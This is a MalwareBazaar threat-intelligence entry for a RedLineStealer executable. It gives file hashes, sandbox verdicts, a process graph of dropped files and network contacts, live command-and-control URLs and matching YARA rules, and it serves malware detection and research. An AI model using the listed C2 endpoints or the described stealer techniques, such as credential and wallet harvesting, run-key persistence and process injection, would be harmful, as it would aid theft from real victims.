MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 4310e070b8ac0bb31d103b0b41c6e46a8b44b98dfcaabf8420aae23b73ac07c8. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


RedLineStealer


Vendor detections: 11


Intelligence 11 IOCs 1 YARA 5 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 4310e070b8ac0bb31d103b0b41c6e46a8b44b98dfcaabf8420aae23b73ac07c8
SHA3-384 hash: a0488a153f74ca4e95d46c83fcbdb87c7c80138a51a942f5ece2ec47c31647033114fe9af5df1b6d0e11fafba86b270a
SHA1 hash: acb7e27c7c7666cdb532e7cb55ba7812b9451c40
MD5 hash: 41b6ce45f164abba6dba95fe2dd46761
humanhash: kansas-don-music-fifteen
File name:41B6CE45F164ABBA6DBA95FE2DD46761.exe
Download: download sample
Signature RedLineStealer
Create hunting rule
File size:3'518'147 bytes
First seen:2021-03-25 23:25:53 UTC
Last seen:Never
File type:Executable exe
MIME type:application/x-dosexec
imphash fcf1390e9ce472c7270447fc5c61a0c1 (863 x DCRat, 118 x NanoCore, 94 x njrat)
ssdeep 98304:Ubgfrr2W8Bhf2lK7mrC9poTGgrYrR55WRONw2kvpDD:U2rrehfx7mZGgra+OO75D
Threatray 244 similar samples on MalwareBazaar
TLSH 53F5235274C69972D5720B330775BA19247CBE202E145AEB73E06A9FEF325C0E634B23
Reporter abuse_ch
Tags:exe RedLineStealer


Avatar
abuse_ch
RedLineStealer C2:
http://miwnenalita.xyz/

Indicators Of Compromise (IOCs)

Below is a list of indicators of compromise (IOCs) associated with this malware samples.

IOCThreatFox Reference
http://miwnenalita.xyz/ https://threatfox.abuse.ch/ioc/5384/

Intelligence

File Origin
# of uploads :
1
# of downloads :
189
Origin country :
n/a
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
41B6CE45F164ABBA6DBA95FE2DD46761.exe
Verdict:
Malicious activity
Analysis date:
2021-03-25 23:27:05 UTC
Tags:
evasion trojan stealer
Link:
https://app.any.run/tasks/61856dab-98d0-477b-bf1b-06a6908e0f4a

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection(s):
Win.Packed.Bulz-9840169-0
Create hunting rule

SecuriteInfo.com.Trojan.Rasftuby.Gen.14.10239.27368.UNOFFICIAL
Create hunting rule

Result
Verdict:
Malware
Maliciousness:

Behaviour
Creating a window
Searching for the window
Creating a file in the Windows subdirectories
Creating a process from a recently created file
Launching a process
Creating a file in the %temp% directory
Sending a UDP request
Creating a file
DNS request
Sending a custom TCP request
Launching cmd.exe command interpreter
Reading critical registry keys
Deleting a recently created file
Sending an HTTP GET request
Creating a process with a hidden window
Connecting to a non-recommended domain
Creating a file in the %AppData% directory
Running batch commands
Using the Windows Management Instrumentation requests
Changing a file
Sending an HTTP POST request
Unauthorized injection to a recently created process
Enabling autorun with the standard Software\Microsoft\Windows\CurrentVersion\Run registry branch
Launching a tool to kill processes
Connection attempt to an infection source
Sending an HTTP GET request to an infection source
Result
Verdict:
MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Gathering data
Result
Threat name:
Socelars
Create hunting rule
Detection:
malicious
Classification:
troj.spyw.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/654582
Signature
.NET source code contains potential unpacker
Antivirus detection for dropped file
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
PE file contains section with special chars
PE file has nameless sections
Sigma detected: Regsvr32 Anomaly
Submitted sample is a known malware sample
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected Socelars
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 signatures2 2 Behavior Graph ID: 376226 Sample: ajESKcIz8f.exe Startdate: 26/03/2021 Architecture: WINDOWS Score: 100 156 Antivirus detection for URL or domain 2->156 158 Antivirus detection for dropped file 2->158 160 Multi AV Scanner detection for dropped file 2->160 162 8 other signatures 2->162 10 ajESKcIz8f.exe 1 14 2->10         started        13 iexplore.exe 2->13         started        process3 file4 102 C:\Users\user\Desktop\mmt.exe, PE32 10->102 dropped 104 C:\Users\user\Desktop\aszd.exe, PE32 10->104 dropped 106 C:\Users\user\Desktop\KRSetp.exe, PE32 10->106 dropped 108 5 other files (1 malicious) 10->108 dropped 15 mmt.exe 10->15         started        20 KRSetp.exe 16 6 10->20         started        22 pzysgf.exe 10->22         started        26 5 other processes 10->26 24 iexplore.exe 13->24         started        process5 dnsIp6 136 5.101.110.225 DIGITALOCEAN-ASNUS Netherlands 15->136 80 C:\Users\user\AppData\...\multitimer.exe, PE32 15->80 dropped 82 C:\Users\user\AppData\Local\...\setups.exe, PE32 15->82 dropped 150 Detected unpacking (overwrites its own PE header) 15->150 28 multitimer.exe 15->28         started        32 setups.exe 15->32         started        138 172.67.154.93 CLOUDFLARENETUS United States 20->138 84 C:\ProgramData\7723805.84, PE32 20->84 dropped 86 C:\ProgramData\3398320.37, PE32 20->86 dropped 88 C:\ProgramData\1583231.17, PE32 20->88 dropped 152 Detected unpacking (changes PE section rights) 20->152 140 208.95.112.1 TUT-ASUS United States 22->140 146 2 other IPs or domains 22->146 90 C:\Users\user\AppData\...\jfiag3g_gg.exe, PE32 22->90 dropped 92 C:\Users\user\AppData\Local\Temp\haleng.exe, PE32 22->92 dropped 35 jfiag3g_gg.exe 22->35         started        37 jfiag3g_gg.exe 22->37         started        39 jfiag3g_gg.exe 22->39         started        142 101.36.107.74 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK China 26->142 144 88.99.66.31 HETZNER-ASDE Germany 26->144 148 3 other IPs or domains 26->148 94 C:\Users\user\Documents\...\md9_9sjm.exe, MS-DOS 26->94 dropped 96 MicrosoftMaORrfq6N...lX416ls9Updater.exe, PE32 26->96 dropped 154 Drops PE files to the document folder of the user 26->154 41 cmd.exe 26->41         started        43 WerFault.exe 26->43         started        45 explorer.exe 26->45 injected file7 signatures8 process9 dnsIp10 130 104.248.226.77 DIGITALOCEAN-ASNUS United States 28->130 164 Multi AV Scanner detection for dropped file 28->164 98 C:\Users\user\AppData\Local\...\setups.tmp, PE32 32->98 dropped 47 setups.tmp 32->47         started        166 Tries to harvest and steal browser information (history, passwords, etc) 35->166 100 C:\Users\user\AppData\...\kesp0I0mYF.exe, PE32 41->100 dropped 168 Submitted sample is a known malware sample 41->168 50 kesp0I0mYF.exe 41->50         started        52 conhost.exe 41->52         started        54 taskkill.exe 41->54         started        132 104.42.151.234 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 43->132 134 192.168.2.1 unknown unknown 43->134 file11 signatures12 process13 file14 112 C:\Users\user\AppData\Local\...\psvince.dll, PE32 47->112 dropped 114 C:\Users\user\AppData\...\itdownload.dll, PE32 47->114 dropped 116 C:\Users\user\AppData\Local\Temp\...\idp.dll, PE32 47->116 dropped 118 2 other files (none is malicious) 47->118 dropped 56 iexplore.exe 47->56         started        58 iexplore.exe 47->58         started        60 cmd.exe 50->60         started        63 cmd.exe 50->63         started        process15 file16 65 iexplore.exe 56->65         started        68 iexplore.exe 56->68         started        110 C:\Users\user\AppData\Local\...\9ykwPuIL.0p, PE32 60->110 dropped 70 conhost.exe 60->70         started        72 cmd.exe 60->72         started        74 cmd.exe 60->74         started        76 regsvr32.exe 60->76         started        78 conhost.exe 63->78         started        process17 dnsIp18 120 35.190.11.164 GOOGLEUS United States 65->120 122 138.197.53.157 DIGITALOCEAN-ASNUS United States 65->122 124 139.45.195.8 RETN-ASEU Netherlands 68->124 126 139.45.197.237 RETN-ASEU Netherlands 68->126 128 12 other IPs or domains 68->128
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/4310e070b8ac0bb31d103b0b41c6e46a8b44b98dfcaabf8420aae23b73ac07c8/
Threat name:
Win32.Infostealer.Passteal
Create hunting rule
Status:
Malicious
First seen:
2021-03-23 00:17:30 UTC
AV detection:
18 of 29 (62.07%)
Threat level:
  5/5
Detection(s):
Malicious file
Link:
https://check.spamhaus.org/check/?searchterm=imioa4fyvqf3ghiqhmfudrxenkfujomn7svl7bbavlrdw45ma7ea._file
Verdict:
malicious
Similar samples:
28f1bd1e02427a817d05c69884c5d5ccf3455859a2f1c3a6dce5e6da75141bcd
RedLineStealer
3bd0eb640c37fb31423b560aeb5bf4f9f6117cb60c2a9e4509b7a0db80e0a092
RedLineStealer
4dadde2cc75cc00a99017299ecfe878299c6c6742ce3abbb198cb440b6b3ce4f
RedLineStealer
6ef31a13d71d059d6e007fb2305c8e2d7615c3d468c9f2f4e023b45490b50787
RedLineStealer
847d04c20badc69bf87617204f50b8ab0a4c1837466025c5cefc115569b581c7
RedLineStealer
c944bccd2c79cfde05f0c641c559256ff09fdff944381f9d220dfd14cb35a7a7
RedLineStealer
cf718397572a0bec4bd3e8797c2d8cc377b35b2ac9aab18874781f1a038dfed0
RedLineStealer
d0d946651c56c06d9ca14c32608fe26da018ed117f7d196fb4aef17c63e1de6f
RedLineStealer
e99107f51a615207824a28411b0355fba67cbda8dbd24d450a84cbe40aa8faf5
RedLineStealer
f69bdd82ca22268d090832707e37b1cae408ba96476843b55feedac11acc6277
RedLineStealer
+ 234 additional samples on MalwareBazaar
Result
Malware family:
vidar
Create hunting rule
Score:
  10/10
Tags:
family:glupteba family:metasploit family:redline family:smokeloader family:vidar backdoor discovery dropper evasion infostealer loader persistence spyware stealer themida trojan upx
Link:
https://tria.ge/reports/210325-q2znc3qh9x/
Behaviour
Checks SCSI registry key(s)
Checks processor information in registry
Delays execution with timeout.exe
Enumerates system info in registry
Kills process with taskkill
Modifies Internet Explorer settings
Modifies data under HKEY_USERS
Modifies registry class
Modifies system certificate store
NTFS ADS
Runs ping.exe
Script User-Agent
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Program crash
Drops file in Program Files directory
Drops file in Windows directory
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Checks for any installed AV software in registry
Checks installed software on the system
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Maps connected drives based on registry
Checks computer location settings
Loads dropped DLL
Modifies file permissions
Reads local data of messenger clients
Reads user/profile data of web browsers
themida
Executes dropped EXE
UPX packed file
Checks for common network interception software
Glupteba
Glupteba Payload
MetaSploit
RedLine
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
Vidar
Malware Config
C2 Extraction:
http://xsss99.icu/upload/
http://bingooodsg.icu/upload/
http://junntd.xyz/upload/
http://ginessa11.xyz/upload/
http://overplayninsx.xyz/upload/
http://bananinze.com/upload/
http://daunimlas.com/upload/
Unpacked files
SH256 hash:
0c2ade2993927f6de828e30c07156c19751b55650a05c965631ca0ea1c983498
MD5 hash:
cc0d6b6813f92dbf5be3ecacf44d662a
SHA1 hash:
b968c57a14ddada4128356f6e39fb66c6d864d3f
Link:
https://www.unpac.me/results/42832c5a-3dfc-4a70-9196-9d8b99f75fba/
SH256 hash:
55361941ab12c7edd987c706d25423d868f756fab1028d99eeffacdabf3da4ca
MD5 hash:
4de4b7bc0a92902422c4204fcfa58150
SHA1 hash:
587e0299ea32cc836281998941daa60f471e3480
Link:
https://www.unpac.me/results/42832c5a-3dfc-4a70-9196-9d8b99f75fba/
SH256 hash:
40ca14be87ccee1c66cce8ce07d7ed9b94a0f7b46d84f9147c4bbf6ddab75a67
MD5 hash:
7165e9d7456520d1f1644aa26da7c423
SHA1 hash:
177f9116229a021e24f80c4059999c4c52f9e830
Link:
https://www.unpac.me/results/42832c5a-3dfc-4a70-9196-9d8b99f75fba/
SH256 hash:
5f7ee5e605bfef4b1a1ac3f4d9c302ddb0765db6aa77a246904dc864de14c661
MD5 hash:
bf0868161e3811c4223ff471574f4846
SHA1 hash:
738106b0d5035a6ca83f407434216f021d96038f
Link:
https://www.unpac.me/results/42832c5a-3dfc-4a70-9196-9d8b99f75fba/
SH256 hash:
0bb9bb0248ff89fac4e513cc1891f8aabbcc076446790c68d849e5a6c007c1ca
MD5 hash:
2fbf0040b06b8719902326d9584c29c3
SHA1 hash:
f2983c7b2d3d91722fb88198ac2441c5e098c2cf
Link:
https://www.unpac.me/results/42832c5a-3dfc-4a70-9196-9d8b99f75fba/
SH256 hash:
2abb1e6941e76ea8dd8cc99046ccf0e8d4b6995e3d519c789dedcc17993ae1e2
MD5 hash:
08900378246f12c89e8fd35d9dda6982
SHA1 hash:
8c2b4eb42021f4837ca1fc06ad8e7cfe06249e3e
Link:
https://www.unpac.me/results/42832c5a-3dfc-4a70-9196-9d8b99f75fba/
SH256 hash:
4d9aee7b3298c5d37636fc5329665d8f2a01796a13f748b2f8217d06a143b4c5
MD5 hash:
0682dd74085fb84ca58b216df14de9fd
SHA1 hash:
8bd40bb9e454afc0b751327594d3f3b3bcd3ec5d
Link:
https://www.unpac.me/results/42832c5a-3dfc-4a70-9196-9d8b99f75fba/
SH256 hash:
9a58e6a714465c5cc5b9f96ec1f740df384ea075bd9938474d509495c6a8afc5
MD5 hash:
bc2b6c86643a8795ab87208ce37cfd1d
SHA1 hash:
7a6c8c312c0e453983a9ffdc40373c5937ed5d21
Link:
https://www.unpac.me/results/42832c5a-3dfc-4a70-9196-9d8b99f75fba/
SH256 hash:
ec11370852f61298a6510d62848532e19e177a8cf8845bdbd430771357d766a1
MD5 hash:
f58986495250e3f318fc8f65ee2f5104
SHA1 hash:
d6ac631d9fc78b85d50dfaf80644fb60b64c8488
Link:
https://www.unpac.me/results/42832c5a-3dfc-4a70-9196-9d8b99f75fba/
SH256 hash:
bd6cc0c088a8d3c1fe2573e428096e0d779491bf5c9e5c28550ef9b1be17f71b
MD5 hash:
3be1509ae3817af2d6fe004880f3da35
SHA1 hash:
2c5ee359532afa37067caaf161c8f693ef38d522
Link:
https://www.unpac.me/results/42832c5a-3dfc-4a70-9196-9d8b99f75fba/
SH256 hash:
9a23959ae58f8d2847d050d4952a22c56bb6c6717d1c06a0b0e8ce77272b4363
MD5 hash:
f633c701273c113ed65c0454c34ce299
SHA1 hash:
fa3ea378e0257e25603a91ca7ef8e925464e18e8
Link:
https://www.unpac.me/results/42832c5a-3dfc-4a70-9196-9d8b99f75fba/
SH256 hash:
3559ea7af670e3e162c4f6468005559f0ff50a6cdffa3d1d8fbf5e62842fd8ff
MD5 hash:
c69a79a4b0ae4e88616606de9cc2e82c
SHA1 hash:
9cd741b33150c9f4021eea786076cd2fb0284b79
Link:
https://www.unpac.me/results/42832c5a-3dfc-4a70-9196-9d8b99f75fba/
SH256 hash:
4880a6d78983787532ea1acd140ac405a7e63cc31bcceb1c15fbd4bf03cc1fd9
MD5 hash:
b7a52eda09378a407090f2fb8d5e2692
SHA1 hash:
ee481b225344d035a804ff849cffb8013d3eb702
Link:
https://www.unpac.me/results/42832c5a-3dfc-4a70-9196-9d8b99f75fba/
SH256 hash:
74e63fb94f0155eae741c062fa47290408fa01d884f51de1e80dc253606cdb3a
MD5 hash:
3c4edc425a24cc99a1686a71fee03b49
SHA1 hash:
cf5589ed119d5529d7c079a9b4905f9b02d0d357
Detections:
win_socelars_auto
Create hunting rule
Link:
https://www.unpac.me/results/42832c5a-3dfc-4a70-9196-9d8b99f75fba/
SH256 hash:
bd35bbdae3c007c0623d5cba08bc214aa0f65da9b6639cf1e1f52cbb6d56cc98
MD5 hash:
303304d8d1c43c4d83310cd9fa57d8b6
SHA1 hash:
9a34d62da325f3d7e0d2e6dafe62c350c31aaddd
Link:
https://www.unpac.me/results/42832c5a-3dfc-4a70-9196-9d8b99f75fba/
SH256 hash:
13e3814f8c88b0864b4be410d7b85bedceda1d32ae30acad913c14f14243f844
MD5 hash:
727706d0daaee6ec778cbaffbd87faf5
SHA1 hash:
0e9e5d684a4d0cb9d8cba7485efcad054807172a
Link:
https://www.unpac.me/results/42832c5a-3dfc-4a70-9196-9d8b99f75fba/
SH256 hash:
4310e070b8ac0bb31d103b0b41c6e46a8b44b98dfcaabf8420aae23b73ac07c8
MD5 hash:
41b6ce45f164abba6dba95fe2dd46761
SHA1 hash:
acb7e27c7c7666cdb532e7cb55ba7812b9451c40
Link:
https://www.unpac.me/results/42832c5a-3dfc-4a70-9196-9d8b99f75fba/
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Tinba
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/4310e070b8ac0bb31d103b0b41c6e46a8b44b98dfcaabf8420aae23b73ac07c8

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:INDICATOR_EXE_Packed_MPress
Create hunting rule
Author:ditekSHen
Description:Detects executables built or packed with MPress PE compressor
Rule name:suspicious_packer_section
Create hunting rule
Author:@j0sm1
Description:The packer/protector section names/keywords
Reference:http://www.hexacorn.com/blog/2012/10/14/random-stats-from-1-2m-samples-pe-section-names/
Rule name:susp_winsvc_upx
Create hunting rule
Author:SBousseaden
Description:broad hunt for any PE exporting ServiceMain API and upx packed
Rule name:win_servhelper_auto
Create hunting rule
Author:Felix Bilstein - yara-signator at cocacoding dot com
Description:autogenerated rule brought to you by yara-signator
Rule name:win_smokeloader_a2
Create hunting rule
Author:pnx

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Comments